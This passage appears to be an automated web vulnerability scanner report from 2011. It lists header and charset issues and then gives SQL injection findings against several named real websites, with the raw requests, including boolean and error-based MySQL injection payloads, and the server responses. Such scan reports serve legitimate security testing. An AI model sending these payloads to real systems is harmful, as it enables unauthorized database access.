28.50. http://www.googleadservices.com/pagead/conversion/1072501689/

28.51. http://www.igotyourindex.com/igyindex.php

28.52. http://www.iveco-ptc.spb.ru/

28.53. http://www.livejournal.com/

28.54. http://www.manageengine.com/products/security-manager/

28.55. https://www.manageengine.com/products/security-manager/index.html

28.56. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/

28.57. http://www.netsuite.com/pages/portal/page_not_found.jspinternal=T

28.58. http://www.smpone.com/

28.59. http://www.tresware.com/

28.60. http://www.trucklist.ru/cars/trucks

29. Cacheable HTTPS response

29.1. https://checkout.netsuite.com/c.438708/js/eset-netsuite.js

29.2. https://checkout.netsuite.com/c.438708/js/lib/mbox.js

29.3. https://checkout.netsuite.com/c.438708/js/lib/mootools-1.2.4-core-yc.js

29.4. https://checkout.netsuite.com/empty.html

29.5. https://checkout.netsuite.com/pages/portal/page_not_found.jsp

29.6. https://checkout.netsuite.com/robots.txt

29.7. https://checkout.netsuite.com/s.nl

29.8. https://customer.kronos.com/Default.asp

29.9. https://employer.unicru.com/asp/home/login.asp

29.10. https://forms.netsuite.com/pages/portal/page_not_found.jsp

29.11. https://hourly.deploy.com/hmc/report/

29.12. https://hourly.deploy.com/hmc/report/index.cfm

29.13. https://hourly.deploy.com/hmc/report/index.cfm/%22ns=%22netsparker(0x000042)

29.14. https://hourly.deploy.com/hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529)

29.15. https://store.manageengine.com/

29.16. https://store.manageengine.com/service-desk/index.html

29.17. https://system.netsuite.com/pages/customerlogin.jsp

29.18. https://www.depthsecurity.com/company.aspx

29.19. https://www.depthsecurity.com/contact-us.aspx

29.20. https://www.depthsecurity.com/professional-services.aspx

29.21. https://www.depthsecurity.com/services.aspx

29.22. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx

29.23. https://www.manageengine.com/network-performance-management.html

29.24. https://www.manageengine.com/products/security-manager/index.html

29.25. https://www.manageengine.com/products/security-manager/security-manager-forum.html

30. Multiple content types specified

31. HTML does not specify charset

31.1. https://customer.kronos.com/

31.2. https://customer.kronos.com/Default.asp

31.3. https://customer.kronos.com/portalproblems.asp

31.4. https://customer.kronos.com/user/forgotpassword.asp

31.5. https://customer.kronos.com/user/forgotusername.asp

31.6. https://customer.kronos.com/user/logindenied.asp

31.7. https://employer.unicru.com/asp/home/login.asp

31.8. http://foreign.dt00.net/zones/zone1.php

31.9. http://foreign.dt00.net/zones/zone23.php

31.10. http://foreign.dt00.net/zones/zone25.php

31.11. http://foreign.dt00.net/zones/zone40.php

31.12. http://goods.adnectar.com/static/quantcast_1.html

31.13. http://kino.webalta.ru/banners.xml

31.14. http://kroogy.com/favicon.ico

31.15. http://my.webalta.ru/feed/l.php

31.16. http://my.webalta.ru/public/visual/themes/css.php

31.17. http://now.eloqua.com/visitor/v200/svrGP.aspx

31.18. http://www.igotyouremail.com/igye_conversion.php

31.19. http://www.praetorian.com/contactus.html

31.20. http://www.praetorian.com/external-network-penetration-test.html

31.21. http://www.praetorian.com/images/fieldbg.gif

31.22. http://www.smpone.com/javascript/common.php

31.23. http://www.smpone.com/javascript/image_pop.php

31.24. http://www.smpone.com/javascript/showimages.php

31.25. http://www.tresware.com/javascript/bbcode.php

31.26. http://www.tresware.com/javascript/common.php

31.27. http://www.tresware.com/javascript/edittags.php

31.28. http://www.tresware.com/javascript/image_pop.php

31.29. http://www.tresware.com/javascript/showimages.php

32. HTML uses unrecognised charset

32.1. http://b2bcontext.ru/services/advertisement/getblock

32.2. http://ideco-software.ru/products/ims/

32.3. http://mail.ru/

32.4. http://my.webalta.ru/

32.5. http://vkontakte.ru/

32.6. http://vkontakte.ru/login.php

32.7. http://www.gartner.com/include/webtrends.jsp

33. Content type incorrectly stated

33.1. http://an.yandex.ru/code/47934

33.2. http://an.yandex.ru/code/57617

33.3. http://an.yandex.ru/code/66894

33.4. http://ar.voicefive.com/b/rc.pli

33.5. http://auto.webalta.ru/favicon.ico

33.6. http://auto.webalta.ru/public/css/style-auto.css

33.7. http://auto.webalta.ru/public/js/webalta.js

33.8. http://b2bcontext.ru/services/advertisement/getblock

33.9. http://css.loveplanet.ru/3/img/pda/main.js

33.10. http://direct.yandex.ru/pages/direct/_direct-1303387947.js

33.11. http://direct.yandex.ru/pages/index/_index-1303387946.js

33.12. http://event.adxpose.com/event.flow

33.13. http://foreign.dt00.net/zones/form4.js

33.14. http://foreign.dt00.net/zones/zone1.php

33.15. http://foreign.dt00.net/zones/zone23.php

33.16. http://foreign.dt00.net/zones/zone25.php

33.17. http://foreign.dt00.net/zones/zone40.php

33.18. http://games.webalta.ru/public/css/style-games.css

33.19. http://goods.adnectar.com/analytics/get_avia_js

33.20. https://hourly.deploy.com/images/logo.jpg

33.21. http://img.webalta.ru/public/css/style.css

33.22. http://img.webalta.ru/public/js/webalta.js

33.23. http://js.dt00.net/public/smi/elastic/24.js

33.24. http://kino.webalta.ru/banners.xml

33.25. http://kino.webalta.ru/sc/l/loach.js

33.26. http://l-files.livejournal.net/userapps/10/image

33.27. http://l-files.livejournal.net/userapps/2/image

33.28. http://l-files.livejournal.net/userapps/3/image

33.29. http://l-files.livejournal.net/userapps/4/image

33.30. http://l-files.livejournal.net/userapps/9/image

33.31. http://l-files.livejournal.net/vgift/445/small

33.32. http://learn.shavlik.com/shavlik/userCheck.cfm

33.33. http://limg.imgsmail.ru/mail/ru/css/search_top.css

33.34. http://mbox9e.offermatica.com/m2/eset/mbox/standard

33.35. http://my.webalta.ru/feed/l.php

33.36. http://my.webalta.ru/public/engine/app.js

33.37. http://my.webalta.ru/public/engine/catalog/general.txt

33.38. http://my.webalta.ru/public/engine/fw/fw_cookies.js

33.39. http://my.webalta.ru/public/engine/move.js

33.40. http://my.webalta.ru/public/engine/page.js

33.41. http://my.webalta.ru/public/engine/reader.js

33.42. http://my.webalta.ru/public/engine/settings.js

33.43. http://my.webalta.ru/public/engine/skinpacks.js

33.44. http://my.webalta.ru/public/engine/templates.js

33.45. http://my.webalta.ru/public/engine/widget/browse/widget_script.js

33.46. http://my.webalta.ru/public/engine/widget/flash/widget_script.js

33.47. http://my.webalta.ru/public/engine/widget/gameboss/widget_script.js

33.48. http://my.webalta.ru/public/engine/widget/labpixies/widget_script.js

33.49. http://my.webalta.ru/public/visual/index.css

33.50. http://my.webalta.ru/public/visual/theme.css

33.51. http://my.webalta.ru/public/visual/themes/css.php

33.52. http://now.eloqua.com/visitor/v200/svrGP.aspx

33.53. http://pogoda.webalta.ru/favicon.ico

33.54. http://pogoda.webalta.ru/public/css/style-weather.css

33.55. http://pogoda.webalta.ru/public/js/search.js

33.56. http://smiimg.dt00.net/smi/2011/04/20110414khlopin-75x75.jpg

33.57. http://tengrinews.kz/static/js/remainNY.js

33.58. http://translate.googleapis.com/translate_a/t

33.59. http://vkontakte.ru/js/lang0_0.js

33.60. http://www.eset.com/us/scripts/business.js

33.61. http://www.eset.com/us/scripts/common.js

33.62. http://www.eset.com/us/scripts/elqNow/elqCfg.js

33.63. http://www.eset.com/us/scripts/elqNow/elqImg.js

33.64. http://www.eset.com/us/scripts/lib/autocompleter/Autocompleter.js

33.65. http://www.eset.com/us/scripts/lib/jq-promo-lib.js

33.66. http://www.eset.com/us/scripts/lib/jq.js

33.67. http://www.eset.com/us/scripts/lib/mbox.js

33.68. http://www.eset.com/us/scripts/lib/mootools-1.2.3-core-yc.js

33.69. http://www.eset.com/us/scripts/lib/s_code3.js

33.70. http://www.eset.com/us/scripts/store.js

33.71. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx

33.72. http://www.gartner.com/include/webtrends.jsp

33.73. http://www.gartner.com/technology/include/metricsHelper.jsp

33.74. http://www.iveco-ptc.spb.ru/images/menu/4d95d099884d7.gif

33.75. http://www.livejournal.com/favicon.ico

33.76. http://www.livejournal.com/tools/endpoints/journalspotlight.bml

33.77. http://www.manageengine.com/images/bandwidth-monitoring.gif

33.78. http://www.manageengine.com/images/ip-sla-voip-monitoring.gif

33.79. http://www.manageengine.com/images/network-configuration-management.gif

33.80. http://www.manageengine.com/images/network-health-monitoring.gif

33.81. http://www.manageengine.com/images/network-mapping.gif

33.82. http://www.manageengine.com/images/traffic-analysis.gif

33.83. http://www.manageengine.com/images/wan-monitoring.gif

33.84. http://www.netsuite.com/portal/javascript/effects.js

33.85. http://www.netsuite.com/portal/javascript/prototype.js

33.86. http://www.smpone.com/javascript/common.php

33.87. http://www.smpone.com/javascript/image_pop.php

33.88. http://www.smpone.com/javascript/showimages.php

33.89. http://www.tresware.com/javascript/bbcode.php

33.90. http://www.tresware.com/javascript/common.php

33.91. http://www.tresware.com/javascript/edittags.php

33.92. http://www.tresware.com/javascript/image_pop.php

33.93. http://www.tresware.com/javascript/showimages.php

33.94. http://www.trucklist.ru/webroot/delivery/js/scripts.js

34. Content type is not specified

34.1. https://checkout.netsuite.com/server-info

34.2. https://checkout.netsuite.com/server-status

34.3. https://hourly.deploy.com/hmc/report/index.cfm

34.4. http://kronos.tt.omtrdc.net/m2/kronos/mbox/standard

34.5. http://partner-support.wiki.zoho.com/favicon.ico

35. SSL certificate

35.1. https://checkout.netsuite.com/

35.2. https://forms.netsuite.com/

35.3. https://store.manageengine.com/

35.4. https://system.netsuite.com/

35.5. https://www.manageengine.com/



1. SQL injection  next
There are 22 instances of this issue:


1.1. http://learn.shavlik.com/shavlik/index.cfm [h parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The h parameter appears to be vulnerable to SQL injection attacks. The payloads 52506121%20or%201%3d1--%20 and 52506121%20or%201%3d2--%20 were each submitted in the h parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /shavlik/index.cfm?m=521&pg=372&h=052506121%20or%201%3d1--%20&hp=372 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.13.10.1303732848

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:47:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                                       
...[SNIP]...
<!-- 1334 372 -->
       
       
       
           
       
       
       
   
       
   














   
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
   


   
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   

   

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Shavlik Free Antivirus Software Download</title>


<link rel="stylesheet" href="style/style2.css" type="text/css" media="all" />
<!--[if IE 6]>
<style>
#navitem a {padding-bottom:0px;}
</style>
<![endif]-->
   <script language="javascript" type="text/javascript">
       function windowOpen(sURL, bFade, sWindowName) {
   
           if (bFade) {
               document.getElementById("body").style.backgroundColor = "gray";
           }
           
           sWindowName = sWindowName || "newWindow";
           
           nPosX = (window.screen.width/2) - (400);
           nPosY = (window.screen.height/2) - (350 + 75);
           
           newWindow = window.open(sURL,sWindowName,"status=0,toolbar=0,scrollbars=1,width=800,height=600,screenX=" + nPosX + ",screenY=" + nPosY);
           
           newWindow.focus();
               
           }
               
   
   var req;

function docLoad(url) {
   req = false;
// non IE
if(window.XMLHttpRequest && !(window.ActiveXObject)) {
   try {
           req = new XMLHttpRequest();
} catch(e) {
           req = false;
}
// IE
} else if(window.ActiveXObject) {
   try {
   req = new ActiveXObject("Msxml2.XMLHTTP");
   } catch(e) {
   try {
       req = new Ac
...[SNIP]...

Request 2

GET /shavlik/index.cfm?m=521&pg=372&h=052506121%20or%201%3d2--%20&hp=372 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.13.10.1303732848

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:47:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                                       
...[SNIP]...
<!-- 0 372 -->
       
       
       
   
       
   














   
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
   


   
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   

   

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Shavlik Free Antivirus Software Download</title>


<link rel="stylesheet" href="style/style2.css" type="text/css" media="all" />
<!--[if IE 6]>
<style>
#navitem a {padding-bottom:0px;}
</style>
<![endif]-->
   <script language="javascript" type="text/javascript">
       function windowOpen(sURL, bFade, sWindowName) {
   
           if (bFade) {
               document.getElementById("body").style.backgroundColor = "gray";
           }
           
           sWindowName = sWindowName || "newWindow";
           
           nPosX = (window.screen.width/2) - (400);
           nPosY = (window.screen.height/2) - (350 + 75);
           
           newWindow = window.open(sURL,sWindowName,"status=0,toolbar=0,scrollbars=1,width=800,height=600,screenX=" + nPosX + ",screenY=" + nPosY);
           
           newWindow.focus();
               
           }
               
   
   var req;

function docLoad(url) {
   req = false;
// non IE
if(window.XMLHttpRequest && !(window.ActiveXObject)) {
   try {
           req = new XMLHttpRequest();
} catch(e) {
           req = false;
}
// IE
} else if(window.ActiveXObject) {
   try {
   req = new ActiveXObject("Msxml2.XMLHTTP");
   } catch(e) {
   try {
       req = new ActiveXObject("Microso
...[SNIP]...

1.2. http://learn.shavlik.com/shavlik/index.cfm [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The m parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the m parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /shavlik/index.cfm?m=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20@@VERSION)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))'&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Cookie: CFID=799689; CFTOKEN=67476078
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 25 Apr 2011 12:26:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                                                                           
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND DMMESSAGE.userCompanyID = 21
               ORDER BY
               DMMESSAGE.ID' at line 7
</font>
...[SNIP]...

1.3. https://www.depthsecurity.com/WebResource.axd [d parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.depthsecurity.com
Path:   /WebResource.axd

Issue detail

The d parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the d parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /WebResource.axd?d=_0LWmoUbQjyz3xspJWMQMg2'%20and%201%3d1--%20&t=633978532604062500 HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/contact-us.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286; __utmb=5781286.2.10.1303735972

Response 1

HTTP/1.1 302 Denied
Content-Type: text/html
Location: http://www.depthsecurity.com
X-dotDefender-denied: 1
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 13:11:33 GMT
Connection: close

<html></html>

Request 2

GET /WebResource.axd?d=_0LWmoUbQjyz3xspJWMQMg2'%20and%201%3d2--%20&t=633978532604062500 HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/contact-us.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286; __utmb=5781286.2.10.1303735972

Response 2 (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6045
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 13:11:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Depth Security - A Trusted Information Security Partner</title>
<link rel="stylesheet" type="text/css" href="css/style.css" />
<link rel="SHORTCUT ICON" href="images/icon.jpg" />
<meta name="keywords" content="Information Security Partner, Information Security Advisor, Network Security, Web Application Security, Depth Security, Vendor Independent Security Services, Security Architecture and Design" />
<meta name="description" />
<meta name="robots" content="all" />
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
</head>
<body class="main">
<div id="page">

<div id="header-holder">
<div id="header">
<div class="logo"><a href="home.aspx"><img src="images/logo_221x53.gif" width="221" height="53" alt="DepthSecurity.com" title="DepthSecurity.com" /></a></div>

<div id="header-nav">
<div class="option"><div class="hot1"><a href="home.aspx"><img src="images/1px.gif" width="42" height="14" /></a></div></div>
<div class="option"><div class="link2"><a href="company.aspx"><img src="images/1px.gif" width="66" height="14" /></a></div></div>
<div class="option"><div class="link3"><a href="services.aspx"><img src="images/1px.gif" width="62" height="14" /></a></div></div>
<div class="option"><div class="link4"><a href="applicure-technologies-partnership.aspx"><img src="images/1px.gif" width="42" height="14" /></a></div></div>
<div class="option" style="border-right:none;"><div class="link5"><a href="contact-us.aspx"><img src="images/1px.gif" width="81" height="14" /></a></div></div>
<div class
...[SNIP]...

1.4. https://www.depthsecurity.com/WebResource.axd [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.depthsecurity.com
Path:   /WebResource.axd

Issue detail

The t parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the t parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /WebResource.axd?d=_0LWmoUbQjyz3xspJWMQMg2&t=633978532604062500'%20and%201%3d1--%20 HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/contact-us.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286; __utmb=5781286.2.10.1303735972

Response 1

HTTP/1.1 302 Denied
Content-Type: text/html
Location: http://www.depthsecurity.com
X-dotDefender-denied: 1
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 13:11:50 GMT
Connection: close

<html></html>

Request 2

GET /WebResource.axd?d=_0LWmoUbQjyz3xspJWMQMg2&t=633978532604062500'%20and%201%3d2--%20 HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/contact-us.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286; __utmb=5781286.2.10.1303735972

Response 2

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 3005
Content-Type: application/x-javascript
Expires: Tue, 24 Apr 2012 13:10:53 GMT
Last-Modified: Thu, 31 Dec 2009 16:47:40 GMT
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 13:11:51 GMT

function WebForm_FindFirstFocusableChild(control) {
if (!control || !(control.tagName)) {
return null;
}
var tagName = control.tagName.toLowerCase();
if (tagName == "undefined") {
return null;
}
var children = control.childNodes;
if (children) {
for (var i = 0; i < children.length; i++) {
try {
if (WebForm_CanFocus(children[i])) {
return children[i];
}
else {
var focused = WebForm_FindFirstFocusableChild(children[i]);
if (WebForm_CanFocus(focused)) {
return focused;
}
}
} catch (e) {
}
}
}
return null;
}
function WebForm_AutoFocus(focusId) {
var targetControl;
if (__nonMSDOMBrowser) {
targetControl = document.getElementById(focusId);
}
else {
targetControl = document.all[focusId];
}
var focused = targetControl;
if (targetControl && (!WebForm_CanFocus(targetControl)) ) {
focused = WebForm_FindFirstFocusableChild(targetControl);
}
if (focused) {
try {
focused.focus();
if (__nonMSDOMBrowser) {
focused.scrollIntoView(false);
}
if (window.__smartNav) {
window.__smartNav.ae = focused.id;
}
}
catch (e) {
}
}
}
function WebForm_CanFocus(element) {
if (!element || !(element.tagName)) return false;
var tagName = element.tagName.toLowerCase();
return (!(element.disabled) &&
(!(
...[SNIP]...

1.5. http://www.eset.com/us/ [PHPSESSID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.eset.com
Path:   /us/

Issue detail

The PHPSESSID cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the PHPSESSID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /us/ HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6'%20and%201%3d1--%20; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=check#true#1303736408|session#1303736347554-914602#1303738208|PC#1303736347554-914602.17#1304945949; __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738202515%3B%20gpv_pageName%3Dus/store%7C1303738202519%3B%20s_nr%3D1303736402523-Repeat%7C1335272402523%3B%20s_invisit%3Dtrue%7C1303738202525%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/store%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257BaddMboxValue%25252528%25252527ns_form_1%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DIMAGE%3B

Response 1

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=rhlh0535fscpi8b9l3gmc676d2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=3; expires=Fri, 24-Jun-2011 15:15:10 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26653
Date: Mon, 25 Apr 2011 15:15:10 GMT
X-Varnish: 555648175
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
+"="+escape(cookieValue)
    + ";expires="+expire.toGMTString();
   }

   var speed = 'fast';
   
   var j = jQuery.noConflict();
       var selectedTab = 0;
   j(document).ready(function(){
       j("#bannerWrapper").css({'left': '-'+(980*selectedTab)+'px'});
       j("#tab"+selectedTab).show();
       j("#tab"+selectedTab).addClass('visible');        
       j("#link_tab"+selectedTab).addClass('selected');
       
       
       j(".clicker").live('click',function(){
           var linkId = j(this).attr('id').split('_');
           var tab = linkId[1];
           var indx = null;
           j('.clicker').each(function(){
               if(j(this).hasClass('selected'))
               {
                   
                   indx = j(this).attr('id').split('_');
                   j(this).removeClass('selected');
               }
           });
           
           indexNum = indx[1].replace(/[^\d]+/i,'');
           var clicked = tab.replace(/[^\d]+/i,'');

           var diff = clicked-indexNum;
           
           j('#bannerWrapper').animate({"left":"-="+(980*diff)},speed);
